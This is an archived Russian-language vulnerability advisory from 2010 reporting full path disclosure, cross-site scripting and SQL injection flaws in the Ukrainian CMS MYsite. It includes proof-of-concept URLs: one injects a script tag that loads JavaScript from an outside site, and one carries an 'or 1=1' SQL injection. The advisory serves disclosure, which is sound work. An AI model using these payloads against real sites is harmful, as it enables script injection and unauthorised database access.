Уязвимости в CMS MYsite

2010-09-27T00:00:00
ID SECURITYVULNS:DOC:24795
Type securityvulns
Reporter Securityvulns
Modified 2010-09-27T00:00:00

Description

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting и Insufficeint Anti-automation уязвимостях в CMS MYsite (это украинская коммерческая CMS).

Full path disclosure (WASC-13):

http://site/portal/modules.php?name=Ads

XSS (WASC-08):

http://site/portal/modules.php?name=Web_Links&l_op=search&query=%3Cscript%20src=http://websecurity.com.ua/webtools/xss.js%20

SQL Injection (WASC-19):

http://site/print.php?id=1&pid=-1%20or%201=1

Уязвимы все версии CMS MYsite до последней, где уязвимости были исправлены (по большей части). Лишь XSS уязвимость была некачественно исправлена и при отключенных mq на сайте возможно проведение XSS атаки.

Дополнительная информация о данных уязвимостях у меня на сайте: http://websecurity.com.ua/4330/

Best wishes & regards, MustLive Администратор сайта http://websecurity.com.ua